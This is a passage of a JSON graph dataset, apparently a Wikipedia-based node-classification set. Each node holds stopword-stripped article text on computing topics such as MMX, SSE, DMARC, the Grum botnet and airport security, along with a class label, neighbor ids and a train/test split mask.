      5397,
      4637,
      1700,
      6058,
      7983,
      7602,
      4147,
      823,
      7483,
      3664,
      1107,
      6371,
      5612,
      6380,
      5363,
      4219,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8125,
    "label": 3,
    "text": "MMX_(instruction_set):mmx instruction set mmx single instruction multiple data simd instruction set designed intel introduced 1997 p5-based pentium line microprocessors designated pentium mmx technology developed similar unit introduced intel i860 earlier intel i750 video pixel processor mmx processor supplementary capability supported recent ia-32 processors intel vendors new york times described initial push including super bowl ads focused new generation glitzy multimedia products including videophones 3-d video games mmx subsequently extended several programs intel others 3dnow streaming simd extensions sse ongoing revisions advanced vector extensions avx mmx officially meaningless initialism trademarked intel unofficially initials variously explained standing newsweek described 57 new 'instructions etched microscopically onto face chip amd one numerous court battles intel produced marketing material intel indicating mmx stood matrix math extensions since initialism trademarked attempt invalidate intel trademark 1995 intel filed suit amd cyrix corp. misuse trademark mmx amd intel settled amd acknowledging mmx trademark owned intel intel granting amd rights use mmx trademark technology name processor name mmx defines eight registers called mm0 mm7 operations operate register 64 bits wide used hold either 64-bit integers multiple smaller integers packed format single instruction applied two 32-bit integers four 16-bit integers eight 8-bit integers mmx provides integer operations originally developed intel i860 use integer math made sense 2d 3d calculations required graphics cards much became common integer simd cpu became somewhat redundant graphical applications hand saturation arithmetic operations mmx could significantly speed digital signal processing applications avoid compatibility problems context switch mechanisms existing operating systems mmx registers aliases existing x87 fpu registers context switches would already save restore unlike x87 registers behave like stack mmx registers directly addressable random access operation involving floating point stack might also affect mmx registers vice versa aliasing makes difficult work floating point simd operations application maximize performance programmers often used processor exclusively one mode deferring relatively slow switch long possible 64-bit mmx register corresponds mantissa part 80-bit x87 register upper 16 bits x87 registers thus go unused mmx bits set ones making nans infinities floating point representation used applications decide whether particular register content intended floating point simd data software support mmx slow coming intel c compiler related development tools obtained intrinsics invoking mmx instructions intel released libraries common vectorized algorithms using mmx intel metrowerks attempted automatic vectorization compilers operations c programming language mapped poorly onto mmx instruction set custom algorithms 2000 typically still written assembly amd competing x86 microprocessor vendor enhanced intel mmx 3dnow instruction set 3dnow best known adding single-precision 32-bit floating-point support simd instruction-set among integer general enhancements following mmx intel next major x86 extension sse introduced pentium-iii family 1999 roughly year amd 3dnow introduced sse addressed core shortcomings mmx inability mix integer-simd ops floating-point ops creating new 128-bit wide register file xmm0–xmm7 new simd instructions like 3dnow sse focused exclusively single-precision floating-point operations 32-bit integer simd operations still performed using mmx register instruction set however new xmm register-file allowed sse simd-operations freely mixed either mmx x87 fpu ops sse2 introduced pentium 4 extended x86 simd instruction set integer 8/16/32 bit double-precision floating-point data support xmm register file sse2 also allowed mmx opcodes use xmm register operands extended even wider ymm zmm registers later sse revisions intel marvell xscale microprocessor core starting pxa270 include simd instruction set extension arm core called iwmmxt whose functions similar ia-32 mmx extension iwmmxt stands intel wireless mmx technology provides arithmetic logic operations 64-bit integer numbers software may choose instead perform two 32-bit four 16-bit eight 8-bit operations single instruction extension contains 16 data registers 64-bits eight control registers 32-bits registers accessed standard arm architecture coprocessor mapping mechanism iwmmxt occupies coprocessors 0 1 space opcodes clash opcodes earlier floating-point extension fpa later versions marvell arm processors supports wmmx wireless mmx wmmx2 wireless mmx2 support",
    "neighbors": [
      6151,
      4108,
      5649,
      533,
      1053,
      2088,
      1085,
      7234,
      3142,
      8795,
      1119,
      2655,
      1122,
      3175,
      7783,
      4204,
      1137,
      4217,
      3194,
      10375,
      1677,
      4237,
      7313,
      8851,
      6804,
      8855,
      9369,
      9391,
      2224,
      9911,
      2237,
      5309,
      6339,
      5326,
      5844,
      725,
      9428,
      731,
      7387,
      3294,
      10985,
      9964,
      5358,
      1776,
      8944,
      3317,
      9976,
      5883,
      5380,
      2821,
      1798,
      6924,
      4886,
      3352,
      9500,
      2361,
      8506,
      833,
      6978,
      5444,
      9541,
      11080,
      4444,
      9582,
      372,
      1399,
      1915,
      10620,
      8578,
      3459,
      3973,
      9095,
      4491,
      9611,
      8590,
      6038,
      9111,
      9126,
      1461,
      8120,
      8126,
      6596,
      1998,
      7631,
      977,
      2514,
      3537,
      2516,
      5073,
      477,
      5088,
      1000,
      7657,
      8680,
      8684,
      1005,
      4078,
      499,
      4603,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8126,
    "label": 3,
    "text": "Streaming_SIMD_Extensions:streaming simd extensions computing streaming simd extensions sse single instruction multiple data simd instruction set extension x86 architecture designed intel introduced 1999 pentium iii series central processing units cpus shortly appearance advanced micro devices amd 3dnow sse contains 70 new instructions work single precision floating point data simd instructions greatly increase performance exactly operations performed multiple data objects typical applications digital signal processing graphics processing intel first ia-32 simd effort mmx instruction set mmx two main problems re-used existing x87 floating point registers making cpus unable work floating point simd data time worked integers sse floating point instructions operate new independent register set xmm registers adds integer instructions work mmx registers sse subsequently expanded intel sse2 sse3 ssse3 sse4 supports floating point math wider applications mmx became popular addition integer support sse2 made mmx largely redundant code though performance increases attained situations using mmx parallel sse operations sse originally called katmai new instructions kni katmai code name first pentium iii core revision katmai project intel sought distinguish earlier product line particularly flagship pentium ii later renamed internet streaming simd extensions isse sse amd eventually added support sse instructions starting athlon xp duron morgan core processors sse originally added eight new 128-bit registers known codice_1 codice_2 amd64 extensions amd originally called x86-64 added eight registers codice_3 codice_4 extension duplicated intel 64 architecture also new 32-bit control/status register codice_5 registers codice_3 codice_4 accessible 64-bit operating mode sse used single data type xmm registers sse2 would later expand usage xmm registers include 128-bit registers additional machine states operating system must preserve across task switches disabled default operating system explicitly enables means os must know use codice_8 codice_9 instructions extended pair instructions save x86 sse register states support quickly added major ia-32 operating systems first cpu support sse pentium iii shared execution resources sse floating point unit fpu compiled application interleave fpu sse instructions side-by-side pentium iii issue fpu sse instruction clock cycle limitation reduces effectiveness pipelining separate xmm registers allow simd scalar floating point operations mixed without performance hit explicit mmx/floating point mode switching sse introduced scalar packed floating point instructions following simple example demonstrates advantage using sse consider operation like vector addition used often computer graphics applications add two single precision four-component vectors together using x86 requires four floating-point addition instructions corresponds four x86 fadd instructions object code hand following pseudo-code shows single 128-bit 'packed-add instruction replace four scalar addition instructions x86 instruction set extensions bios operating system application programmer test detect existence proper operation user application uptake x86 extensions slow even bare minimum baseline mmx sse support cases non-existent applications 10 years extensions became commonly available distributed computing accelerated use extensions scientific community—and many scientific applications refuse run unless cpu supports sse2 sse3 use multiple revisions application cope many different sets extensions available simplest way around x86 extension optimization problem software libraries applications begun support multiple extension types hinting full use available x86 instructions may finally become common 5 15 years instructions initially introduced processor id applications",
    "neighbors": [
      4098,
      4108,
      5649,
      1053,
      2088,
      1085,
      7234,
      3142,
      585,
      8266,
      8795,
      1119,
      2655,
      1122,
      7783,
      4204,
      1137,
      4217,
      10375,
      4237,
      10383,
      6804,
      8853,
      8855,
      9369,
      2732,
      9391,
      2224,
      4276,
      9911,
      2237,
      5309,
      6339,
      5326,
      5844,
      725,
      9428,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      3317,
      9976,
      5883,
      5380,
      2821,
      1798,
      6924,
      4886,
      3352,
      9500,
      11559,
      7983,
      4920,
      8506,
      833,
      6978,
      5444,
      9541,
      11080,
      9582,
      1399,
      11130,
      1915,
      10620,
      3459,
      3973,
      9095,
      6025,
      4491,
      9611,
      398,
      6038,
      9111,
      1435,
      7071,
      9126,
      1461,
      8120,
      7097,
      8125,
      6078,
      6596,
      1998,
      977,
      2514,
      5073,
      1502,
      1000,
      7657,
      8169,
      1515,
      8680,
      1005,
      4078,
      8684,
      499,
      3573,
      8186,
      4603,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 8127,
    "label": 2,
    "text": "Microreboot:microreboot microrebooting technique used recover failures crash-only software systems instead rebooting whole system subsets fine-grain components restarted granularity components typically finer process level e.g. ejb-level java ee systems goal confining reboot fine-grain components threefold reduce amount time takes system return service minimize failure disruption system users preserve much in-memory application data possible concept proposed 2001 george candea armando fox former graduate student stanford university initially reduced practice systems satellite ground station control system java ee application server later formed basis design commercial systems like aster data systems ncluster",
    "neighbors": [
      2811,
      4646
    ],
    "mask": "Test"
  },
  {
    "node_id": 8128,
    "label": 1,
    "text": "ScaleBase:scalebase scalebase company sold software implement distributed mysql databases cloud computing software company located boston massachusetts area scalebase founded 2009 doron levari ram metser formerly ceo guardium database security company acquired ibm 2009 named ceo october 2012 october 2012 scalebase closed series b round 10.5 million bain capital ventures ascent venture partners original investor cedar fund scalearc raised 5.33 million december 2011 12 million new funding announced january 2013 led accell partners assets scalebase acquired scalearc august 2015 company scalebase provided two technology offerings one also called scalebase analysis genie scalebase software first released august 2011 scalebase distributed database cluster built mysql capability provides scalability availability benefits distributed database retaining relational database characteristics scalebase data distribution policy-based transparent scalebase provides visibility control variables impact data distribution policy scalebase software available amazon web services ec2 rds rackspace ibm cloud analysis genie software service analyzed schema queries purpose suggest data distribution policy uniquely tuned individual application requirements database workloads",
    "neighbors": [
      11136,
      4194,
      7022,
      7248,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 8129,
    "label": 6,
    "text": "Data_cluster:data cluster computer file systems cluster allocation unit unit disk space allocation files directories reduce overhead managing on-disk data structures filesystem allocate individual disk sectors default contiguous groups sectors called clusters disk uses 512-byte sectors 512-byte cluster contains one sector whereas 4-kibibyte kib cluster contains eight sectors cluster smallest logical amount disk space allocated hold file storing small files filesystem large clusters therefore waste disk space wasted disk space called slack space cluster sizes small versus average file size wasted space per file statistically half cluster size large cluster sizes wasted space become greater however larger cluster size reduces bookkeeping overhead fragmentation may improve reading writing speed overall typical cluster sizes range 1 sector 512 b 128 sectors 64 kib cluster need physically contiguous disk may span one track sector interleaving used may even discontiguous within track confused fragmentation sectors still logically contiguous term cluster changed allocation unit dos 4.0 however term cluster still widely used",
    "neighbors": [
      9698,
      8451,
      9762,
      2314,
      9420,
      8301,
      7663,
      2193,
      8049,
      3315,
      2196,
      532,
      2197,
      11667,
      3512,
      3834,
      6843
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8130,
    "label": 4,
    "text": "DMARC:dmarc dmarc domain-based message authentication reporting conformance email authentication protocol designed give email domain owners ability protect domain unauthorized use commonly known email spoofing purpose primary outcome implementing dmarc protect domain used business email compromise attacks phishing emails email scams cyber threat activities dmarc dns entry published receiving email server authenticate incoming email based instructions published domain owner within dns entry email passes authentication delivered trusted email fails check depending instructions held within dmarc record email could delivered quarantined rejected dmarc extends two existing mechanisms sender policy framework spf domainkeys identified mail dkim allows administrative owner domain publish policy dns records specify mechanism dkim spf employed sending email domain check codice_1 field presented end users receiver deal failures reporting mechanism actions performed policies dmarc defined rfc 7489 dated march 2015 informational dmarc policy allows sender domain indicate emails protected spf and/or dkim tells receiver neither authentication methods passes – reject message quarantine policy also specify email receiver report back sender domain messages pass and/or fail policies published public domain name system dns text txt records dmarc n't directly address whether email spam otherwise fraudulent instead dmarc require message pass dkim spf validation also pass alignment dmarc message fail even passes spf dkim fails alignment setting dmarc may positive impact deliverability legitimate senders dmarc operates checking domain message codice_1 field also called 5322.from aligned authenticated domain names either spf dkim alignment checks pass dmarc alignment test passes alignment may specified strict relaxed strict alignment domain names must identical relaxed alignment top-level organizational domain must match organizational domain found checking list public dns suffixes adding next dns label example a.b.c.d.example.com.au example.com.au organizational domain registrar offers names .com.au customers albeit time dmarc spec ietf working group domain boundaries nowadays organizational domain derived public suffix list like spf dkim dmarc uses concept domain owner entity entities authorized make changes given dns domain spf checks ip address sending server authorized owner domain appears smtp codice_3 command email address mail also called envelope-from 5321.mailfrom addition requiring spf check pass dmarc additionally checks 5321.mailfrom aligns 5322.from dkim allows parts email message cryptographically signed signature must cover field within dkim-signature mail header codice_4 domain codice_5 selector tags specify dns retrieve public key signature valid signature proves signer domain owner field n't modified since signature applied may several dkim signatures email message dmarc requires one valid signature domain codice_4 tag aligns sender domain stated codice_1 header field dmarc records published dns subdomain label codice_8 example codice_9 compare spf codice_10 dkim codice_11 content txt resource record consists codice_12 tags separated semicolons similar spf dkim example codice_13 version codice_14 policy codice_15 subdomain policy codice_16 percent bad emails apply policy codice_17 uri send aggregate reports example entity controlling example.com dns domain intends monitor spf and/or dkim failure rates n't expect emails sent subdomains example.com note subdomain publish dmarc record receivers must check falling back organizational domain record dmarc capable producing two separate types reports aggregate reports sent address specified following codice_17 forensic reports emailed address following codice_19 tag mail addresses must specified uri mailto format e.g nowiki mailto worker example.net /nowiki multiple reporting addresses valid must full uri format separated comma target email addresses belong external domains case target domain set dmarc record say agrees receive otherwise would possible exploit reporting spam amplification example say codice_20 receives mail message codice_21 wishes report finds codice_22 looks confirming dns record namespace administered target like aggregate reports sent xml files typically per day subject mentions report domain policy-publishing sender mail messages reported submitter entity issuing report payload attachment long filename consisting bang-separated elements report-issuing receiver begin end epochs reported period unix-style time stamps optional unique identifier extension depends possible compression used codice_23 example codice_24 xml content consists header containing policy report based report metadata followed number records records put database relation viewed tabular form xml schema defined appendix c specifications raw record exemplified dmarc.org stick relational example better conveys nature data dmarc records also directly transformed html applying xsl stylesheet rows grouped source ip authentication results passing count group leftmost result columns labelled spf dkim show dmarc-wise results either pass fail taking alignment account rightmost ones similar labels show name domain claims participate sending message parentheses authentication status claim according original protocol spf dkim regardless identifier alignment right side spf appear twice codice_25 test codice_26 test dkim appear signature present message example first row represents main mail flow example.org second row dkim glitch signature breakage due minor alteration transit third fourth rows show typical failures modes forwarder mailing list respectively dmarc authentication failed last row could affected message disposition example.org specified strict policy disposition reflects policy published actually applied messages none quarantine reject along shown table dmarc provides policy override reasons receiver apply policy different one requested already provided specification forensic reports also known failure reports generated real time consist redacted copies individual emails failed spf dkim based upon value specified codice_27 tag format extension abuse reporting format resembles regular bounces contain either message/rfc822 text/rfc822-headers several different types email forwarding may break spf mailing lists frequent cause legitimate breakage original author domain dkim signature routinely change spf-authenticated domain therefore break dmarc alignment number workarounds possible mailing list software packages working solutions one popular least intrusive workarounds consists rewriting codice_1 header field original author address added codice_30 field rewriting range appending codice_31 domain name allocating temporary user id forward replies list opaque id used keeps user real email address private list addition display name changed show author list list operator examples would result respectively one last line codice_30 designed order accommodate reply-to-author functionality case reply-to-list function covered preceding change codice_1 header field way original meaning fields reversed altering author fair general break expected relationship meaning appearance datum also breaks automated use communities use mailing lists coordinate work deploy tools use codice_1 field attribute authorship attachments wrapping message works nicely use email client understands wrapped messages change perhaps obvious solution except seem legally due countries routinely losing spf authentication may render overall authentication fragile making changes codice_1 header field pass dkim alignment may bring message compliance rfc 5322 section 3.6.2 'from field specifies author message mailbox es person system responsible writing message mailbox refers author email address codice_36 header available indicate email sent behalf another party dmarc checks policy domain ignores sender domain adsp dmarc reject using sender field non-technical basis many user agents n't display recipient draft dmarc specification maintained since 30 january 2012 october 2013 gnu mailman 2.1.16 released options handle posters domain dmarc policy codice_37 change tried anticipate interoperability issues expected case restrictive policies applied domains human users opposed purely transactional mail domains april 2014 yahoo changed dmarc policy codice_37 thereby causing misbehavior several mailing lists days later aol also changed dmarc policy codice_37 moves resulted significant amount disruption mailbox providers accused forcing costs security failures onto third parties ietf working group formed august 2014 order address dmarc issues starting interoperability concerns possibly continuing revised standard specification documentation meanwhile existing dmarc specification reached editorial state agreed upon implemented many published march 2015 independent submission stream informational non-standard category rfc 7489 march 2017 federal trade commission published study dmarc usage businesses study found 10 569 businesses significant online presence publish strict dmarc policies contributors dmarc specification include",
    "neighbors": [
      5254,
      8202,
      7949,
      6808,
      5421,
      4272,
      9909,
      4793,
      8130,
      2887,
      3018,
      4689,
      10578,
      10326,
      479,
      9569,
      488,
      2409,
      4969,
      6762,
      1658
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8131,
    "label": 4,
    "text": "Panda_Cloud_Antivirus:panda cloud antivirus panda cloud antivirus antivirus software developed panda security free paid version available cloud-based sense files scanned remote server without using processing power user machine cloud technology based panda collective intelligence run constantly providing protection viruses malicious websites slowing system extent system scan according panda security panda cloud antivirus able detect viruses trojans worms spyware dialers hacking tools hacker security risks panda cloud antivirus relies collective intelligence cloud up-to-date information normally uses internet connection access up-to-date information internet accessed use local cache common threats circulation april 2009 review found panda cloud antivirus 1.0 clean fast simple easy use good detection rates review scored panda 100.00 malware detection 100.0 malicious url detection overall score 100 strong protection factor considering software version 1.0 released november 10 2009 pc magazine reviewed panda cloud antivirus gave editor choice award best av techradar review states think panda cloud antivirus best viewed defense tool rather utility cleaning system already riddled infection free edition panda cloud antivirus released license usage exclusively allowed private households state schools non-governmental non-profit organizations",
    "neighbors": [
      4194,
      2213,
      202,
      5356,
      7983,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 8132,
    "label": 8,
    "text": "Microsoft_Personal_Web_Server:microsoft personal web server microsoft personal web server pws scaled-down web server software windows operating systems fewer features microsoft internet information services iis functions superseded iis visual studio microsoft officially supports pws windows 95 windows 98 windows 98 se windows nt 4.0 prior release windows 2000 pws available free download well included windows distribution cds pws 4.0 last version found windows 98 cd windows nt 4.0 option pack personal web server originally created vermeer technologies company created microsoft frontpage acquired microsoft installed frontpage versions 1.1 98 well nt workstation 4.0 shipped peer web services based iis 2.0 3.0 iis 4.0 renamed personal web server consistent name used 95/98 since windows 2000 pws renamed iis name used server versions windows standard windows component windows windows xp home edition support neither pws iis although pws installed windows editions windows xp iis included standard microsoft visual studio 2005 pws useful developing web applications localhost deploying production web server ide visual studio 2005 later versions contains built-in lightweight web server development purposes ftp smtp http usual web languages php perl supported pws also supports basic cgi common gateway interface conventions subset classic asp using technologies web applications running pws capable performing interpreting database queries results microsoft also produced version personal web server macintosh based code acquired acquisition resnova software november 1996",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      558,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      3250,
      5300,
      9909,
      7351,
      10428,
      2749,
      2244,
      7364,
      8391,
      200,
      9420,
      2782,
      225,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3857,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      8582,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      3496,
      430,
      6062,
      10673,
      2485,
      9655,
      6584,
      1978,
      960,
      8644,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 8133,
    "label": 4,
    "text": "Grum_botnet:grum botnet grum botnet also known alias tedroo reddyb botnet mostly involved sending pharmaceutical spam e-mails world largest botnet grum traced back early 2008 time shutdown july 2012 grum reportedly world 3rd largest botnet responsible 18 worldwide spam traffic grum relies two types control servers operation one type used push configuration updates infected computers used tell botnet spam emails send july 2010 grum botnet consisted estimated 560,000–840,000 computers infected grum rootkit botnet alone delivered 39.9 billion spam messages march 2010 equating approximately 26 total global spam volume temporarily making world then-largest botnet late 2010 botnet seemed growing output increased roughly 51 comparison output 2009 early 2010 used panel written php control botnet july 2012 malware intelligence company published analysis botnet command control servers located netherlands panama russia later reported dutch colo/isp soon seized two secondary servers responsible sending spam instructions existence made public within one day panamanian isp hosting one grum primary servers followed suit shut server cybercriminals behind grum quickly responded sending instructions six newly established servers ukraine fireeye connected spamhaus cert-gib anonymous researcher shut remaining six c c servers officially knocking botnet sinkhole running former ip addresses grumbot c c servers feed sinkhole processed via shadowserver abusix inform point contact isp infected ip addresses isp asked contact customers infections malware cleaned shadowserver.org inform users service per day abusix sends x-arf extended version abuse reporting format report every hour",
    "neighbors": [
      1024,
      3072,
      10756,
      535,
      9761,
      4644,
      4133,
      4648,
      46,
      10297,
      3643,
      7739,
      9791,
      1608,
      3657,
      8779,
      81,
      8789,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      3724,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      10952,
      3789,
      4304,
      10457,
      4314,
      9435,
      3807,
      5349,
      1254,
      10477,
      9460,
      5886,
      2815,
      3843,
      10502,
      7949,
      3347,
      4883,
      2325,
      278,
      10003,
      8489,
      11052,
      9518,
      7996,
      11583,
      6484,
      857,
      1882,
      7515,
      8032,
      3941,
      4462,
      3956,
      9082,
      9087,
      11152,
      10132,
      9630,
      1440,
      5024,
      10657,
      11175,
      939,
      5547,
      1970,
      441,
      1979,
      4027,
      5563,
      9664,
      9154,
      8644,
      4054,
      988,
      1504,
      9186,
      4585,
      2542,
      2041,
      507,
      3581
    ],
    "mask": "Test"
  },
  {
    "node_id": 8134,
    "label": 4,
    "text": "Airport_security:airport security airport security refers techniques methods used attempt protect passengers staff aircraft airport property accidental/malicious harm crime threats aviation security combination human material resources safeguard civil aviation unlawful interference unlawful interference could acts terrorism sabotage threat life property communication false threat bombing etc large numbers people pass airports every day presents potential targets terrorism forms crime number people located one place similarly high concentration people large airliners increases potentially high death rate attacks aircraft ability use hijacked airplane lethal weapon may provide alluring target terrorism september 11 attacks airport security attempts prevent threats potentially dangerous situations arising entering country airport security succeed chances dangerous situation illegal items threats entering aircraft country airport greatly reduced airport security serves several purposes protect airport country threatening events reassure traveling public safe protect country people monte r. belger u.s. federal aviation administration notes goal aviation security prevent harm aircraft passengers crew well support national security counter-terrorism policy countries may agency protects airports australia australian federal police polices airport countries protection controlled state local level primary personnel vary include resources may include incidents result travelers carrying either weapons items could used weapons board aircraft hijack plane travelers screened metal detectors and/or millimeter wave scanners explosive detection machines used include x-ray machines explosives trace-detection portal machines a.k.a puffer machines united states tsa working new scanning machines still effective searching objects n't allowed airplanes n't depict passengers state undress find embarrassing explosive detection machines also used carry-on checked baggage detect volatile compounds given explosives using gas chromatography recent development controversial use backscatter x-rays detect hidden weapons explosives passengers devices use compton scattering require passenger stand close flat panel produce high resolution image technology released israel early 2008 allows passengers pass metal detectors without removing shoes process required walk-through gate detectors reliable detecting metal shoes lower body extremities alternately passengers step fully shoed onto device scans 1.2 seconds objects small razor blade countries specially trained individuals may engage passengers conversation detect threats rather solely relying equipment find threats single backscatter scan exposes target 0.05 0.1 microsievert radiation comparison exposure standard chest x-ray almost 100 times higher generally people screened airport security areas exit gates aircraft located areas often called secure sterile airside passengers discharged airliners sterile area usually re-screened disembarking domestic flight however still subject search time airport food outlets started using plastic glasses utensils opposed glasses made glass utensils made metal reduce usefulness items weapons united states non-passengers allowed concourses meet arriving friends relatives gates greatly restricted due terrorist attacks non-passengers must obtain gate pass enter secure area airport common reasons non-passenger may obtain gate pass assist children elderly well attending business meetings take place secure area airport united states least 24 hours notice generally required planning attend business meeting inside secure area airport countries australia restrict non-travellers accessing airside area however non-travellers typically subject security scans travellers sensitive areas airports including airport ramps operational spaces restricted general public called sida security identification display area spaces require special qualifications enter systems consist physical access control gates passive systems monitor people moving restricted areas sound alert restricted area entered throughout world dozen airports instituted version trusted traveler program proponents argue security screening made efficient detecting people threats searching argue searching trusted verified individuals take amount time critics argue programs decrease security providing easier path carry contraband another critical security measure used several regional international airports fiber optic perimeter intrusion detection systems security systems allow airport security locate detect intrusion airport perimeter ensuring real-time immediate intrusion notification allows security personnel assess threat track movement engage necessary security procedures notably utilised dulles international airport u.s. military jfpass world first terrorist attack flight cubana flight 455 october 6 1976 airliner flying barbados jamaica brought two time bombs killing 73 people evidence implicated several central intelligence agency-linked anti-castro cuban exiles members venezuelan secret police disip including luis posada carriles single deadliest airline catastrophe resulting failure airport security detect onboard bomb air india flight 182 1985 killed 329 people another onboard bomb slipped airport security one pan flight 103 1988 killed 270 people 259 plane 11 residents lockerbie scotland another notable failure 1994 bombing philippine airlines flight 434 turned test run planned terrorist attack called operation bojinka explosion small killing one person plane made emergency landing operation bojinka discovered foiled manila police 1995 may 30 1972 three members japanese red army undertook terrorist attack popularly called lod airport massacre lod airport known ben gurion international airport tel aviv firing indiscriminately automatic firearms throwing grenades managed kill 24 people injure 78 others neutralized one suicide one three terrorists kozo okamoto survived incident rome vienna airport attacks december 1985 two instances airport security failures attacks left 20 people dead gunmen threw grenades opened fire travelers el al airline ticket counters september 11 attacks widely recognized terrorist attacks recent times involving air travel morning september 11 2001 19 members islamic terrorist group al-qaeda took control four airplanes east coast united states deliberately crashed two world trade center towers new york city third pentagon arlington county virginia fourth plane crashed field near shanksville pennsylvania reaching washington d.c. intended target either u.s. capitol white house attacks resulted deaths 2,996 people including 245 civilians law enforcement officer 19 hijackers board four airplanes july 5 2002 gunman opened fire los angeles international airport israel el al ticket counter shooter killed two people injured four august 10 2006 security airports united kingdom canada united states raised significantly due uncovering british authorities terror plot aimed detonating liquid explosives flights originating countries also notable first time u.s. terror alert level ever reached red incident also led tighter restrictions carrying liquids gels hand luggage eu canada united states. ref name= 1546/2006 /ref restrictions involving airport security determined transport canada implemented canadian air transport security authority catsa conjunction airport operator since september 11 attacks well air india bombing 1985 incidents airport security tightened canada order prevent attacks canadian airspace catsa uses x-ray machines verify contents carry-ons well metal detectors explosive trace detection etd equipment random physical searches passengers pre-board screening points x-ray machines ctx machines high-resolution x-rays etds also used scan checked bags checked baggage always x-rayed major commercial airports catsa launched restricted area identity card raic program january 2007 raic world first dual biometric access control system airports program replaces old airport restricted area passes issued airport employees security checks canadian security intelligence service royal canadian mounted police rcmp transport canada new cards issued checks conducted contain biometric information fingerprints iris scans belonging person issued raic catsa responsible pre-board passenger random non-passenger screening contract third-party service providers g4s securitas gardaworld train manage employ screening officers addition individual airport authorities privatized 1990s canadian government responsible general airport security rather catsa normally contract private companies case large airports pay small contingent local police officers remain site well safety security canada airports provided local police forces rcmp used provide service airports remains today regulation ec 300/2008 european parliament council establishes common rules european union protect civil aviation acts unlawful interference regulation provisions apply airports parts airports located eu country used exclusively military purposes provisions also apply operators including air carriers providing services aforementioned airports also applies entities located inside outside airport premises providing services airports standards regulation 300/2008 implemented commission regulation eu 2015/1998 regulation 2320/2002 2002 introduced requirement security checks passenger flights also domestic eu countries checks domestic flights around 2005 introducing full security checks took time since terminals might need expansion passenger luggage freight security checking security guard duties outsourced contractors general public security responsibility finnish police airport unit helsinki airport airport unit criminal investigation canine tepo terrorist bomb squad ptr police customs border guard intelligence component furthermore units finnish border guard units airports often arrest wanted individuals fugitives border finnish customs seizes e.g weapons false documents explosives addition wanted individuals french security stepped since terrorist attacks france 1986 response france established vigipirate program program uses troops reinforce local security increases requirements screenings id checks since 1996 security check-points transferred police nationale/gendarmerie de l'air private companies hired airport authorities member european economic area iceland adopted ec regulation 300/2008 national law thus complies eu standards airport security international flights domestic flights within icelandic territory however exempted security rules exemption granted eea joint committee citing geographical remoteness country well low population density small size aircraft used domestic operations airport security netherlands provided koninklijke marechaussee kmar royal military constabulary airport security spain provided police forces well private security guards policía nacional provides general security well passport international airports documentation checking catalonia basque country mossos d'esquadra ertzaintza respectively replaced policía nacional except documentation functions guardia civil handles security customs checking often aided private security guards local police provide security traffic control outside airport building security measures controlled state owned company aena bound european commission regulations european union countries airport security handled security guards provided airport police assistance needed airport fire fighters also security guards swedish transport agency decides rules check based international regulations airports generally defined law protected objects give guards extra authority like demanding identity documents search people belongings sweden traditionally seen low-crime country little need security checks sweden introduced security checks international departures international regulations demanded around 1970s/1980s september 2001 decision introduce security checks also domestic flights took years implement domestic airports terminals prepared room department transport dft governing authority airport security united kingdom civil aviation authority caa also responsible certain security regulatory functions september 2004 home office dft started initiative called multi agency threat risk assessment matra piloted five united kingdom major airports — heathrow birmingham east midlands airport newcastle glasgow following successful trials scheme rolled across 44 airports since september 11 attacks new york united kingdom assessed high risk country due support united states invasion afghanistan iraq january 7 2008 travelers longer limited single piece carry-on luggage uk major airports currently hand luggage limited size weight dft/caa although airlines impose rules uk trialed controversial new method screening passengers improve airport security using backscatter x-ray machines provide 360-degree view person well see clothes right skin bones longer used replaced millimeter wave scanners shows hidden items showing body passenger hong kong international airport secured hong kong police force aviation security company avseco within police force airport district responsible safety security airport region airport security units deployed around airport armed h k mp5 a3 sub-machine guns glock 17 pistols security restricted area responsibility police avseco airport control airport authority hong kong aahk security power delegated avseco staffs persons baggages carried must x-rayed checked security screening points avseco exceptions tenant restricted area immigration department check incomers passport identities customs excise department check passengers crews luggage discourage smuggling drugs contraband entering hong kong india stepped airport security 1999 kandahar hijacking central industrial security force paramilitary organisation charge airport security regulatory framework bureau civil aviation security ministry civil aviation cisf formed airport security group protect indian airports every airport given apsu airport security unit trained unit counter unlawful interference civil aviation apart cisf every domestic airline security group looks aircraft security terrorist threats narcotics main threats indian airports another problem airports face proliferation slums around airport boundaries places like mumbai boarding additional searching hand luggage likely moreover cisf many duties context aviation security cargo security screening done regulated agents airlines airports security staff tested certified bureau civil aviation security bcas aviation security regulator el al airlines headquartered israel last hijacking occurred july 23 1968 plane departing ben gurion airport outside tel aviv ever hijacked 1972 terrorists japanese red army launched attack led deaths least 24 people lod airport since security airport relies number fundamentals including heavy focus raphael ron former director security ben gurion airport terms human factor may generalized inescapable fact terrorist attacks carried people found stopped effective security methodology december 27 1985 terrorists simultaneously attacked el al ticket counters rome italy vienna austria airports using machine guns hand grenades nineteen civilians killed many wounded response israel developed methods stop massacres drastically improved security measures around israeli airports even promised provide plainclothes armed guards foreign airport last successful airline-related terrorist attack 1986 security agent found suitcase full explosives initial screening process bag make board injure 13 detonating terminal part focus so-called human factor 